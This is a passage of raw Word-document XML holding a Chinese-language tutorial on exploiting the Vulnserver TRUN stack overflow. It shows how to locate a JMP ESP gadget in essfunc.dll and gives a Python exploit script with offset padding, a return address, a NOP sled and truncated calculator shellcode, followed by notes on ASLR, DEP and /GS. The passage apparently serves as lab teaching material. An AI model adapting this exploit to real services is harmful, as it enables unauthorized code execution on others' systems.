      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DBA617F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>E. 寻找跳板 (Finding a Jump Point)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55635473">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>为了让程序执行我们的恶意代码（Shellcode），我们需要在内存中找到一个地址，该地址包含指令 JMP ESP。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CE1D9F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09E46D68">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>工具：使用 Mona.py 插件在 essfunc.dll（一个不带 ASLR 保护的模块）中查找。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF5E865">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3351E88E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>原因：通过跳转到栈顶（ESP），可以直接执行我们注入的代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B368153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3. 漏洞利用代码示例 (Python 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B097B4E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>以下是针对 TRUN 命令的典型利用脚本结构：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A1F185">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>import socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C30B499">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>import struct</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFDD302">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C1D1BF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>target_ip = "192.168.x.x"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6802075E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>target_port = 9999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC1B267">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64F325B6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t># 1. 偏移量：2003 字节填充</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591A9197">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>padding = b"A" * 2003</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7E0903">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A66DD98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t># 2. 返回地址：指向 essfunc.dll 中的 JMP ESP (例如 0x625011AF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D07C3EF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t># 使用小端序封装地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775F19AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>jmp_esp = struct.pack("&lt;L", 0x625011AF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480F9B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62F1C27D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t># 3. NOP Sled：给 Shellcode 留出缓冲空间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6C957C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>nops = b"\x90" * 32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D750076">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43C675DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t># 4. Shellcode：例如弹出计算器 (由 msfvenom 生成)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D63DB1D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>shellcode = (b"\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x33\xc9..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF668D2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         b"\xb1\x31\x83\xed\xfc\x31\x7d\x14\x03\x7d\xde\x33\x25...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42327BA3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="183A85F9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t># 组合 Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DAC175">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>payload = b"TRUN /.:/" + padding + jmp_esp + nops + shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D74DA7C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="610F73D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138F07C3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s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E643B1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s.connect((target_ip, target_port))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E09FDAA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s.send(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD76DF7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">    print("[+] Payload 已发送，请检查计算器是否弹出！")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7C4260">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>except:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F3E352">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>print("[-] 无法连接到服务器")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D34A00F">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27375F03">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4. 现代防御与应用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4569F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>在实际的 Windows 10 桌面应用中，利用此类漏洞会受到 ASLR（地址随机化）和 DEP（数据执行保护）的限制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B02F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6A4D1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color w:val="auto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Vulnserver 栈溢出漏洞利用演示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：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.youtube.com/watch?v=yJF0YPd8lDw" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>https://www.youtube.com/watch?v=yJF0YPd8lDw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECA58EF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:color w:val="auto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>特别说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D386D0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现代 Windows 10 拥有强大的防护措施（如 ASLR、DEP、GS 编译选项）。为了演示原理，我们需要在编译时手动关闭它们：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E56F510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</w:p>
    <w:p w14:paraId="008B4A53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ASLR (地址空间布局随机化)：防止函数地址固定。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17034695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</w:p>
    <w:p w14:paraId="70E96D1C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DEP (数据执行保护)：防止在堆栈上执行代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C7BA3D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</w:p>
    <w:p w14:paraId="1D2DE41D">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>Stack Canary (/GS)：防止缓冲区溢出破坏返回地址。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AE2E6"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="71FAE2E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B7D131"/>
    <w:rsid w:val="23F70E5A"/>
    <w:rsid w:val="3CFFEC24"/>
    <w:rsid w:val="6FC71DC1"/>
    <w:rsid w:val="7D7B7363"/>
    <w:rsid w:val="FCB7D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1605</Words>
  <Characters>3285</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>3</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>3721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2026-01-09T17:24:00Z</dcterms:created>
  <dc:creator>杨吉云</dc:creator>
  <cp:lastModifiedBy>WPS_1755647290</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-14T08:14:20Z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4DBBC3606A0349F4B71ADA5F5EE77833_13</vt:lpwstr>
  </property>
</Properties>
</file>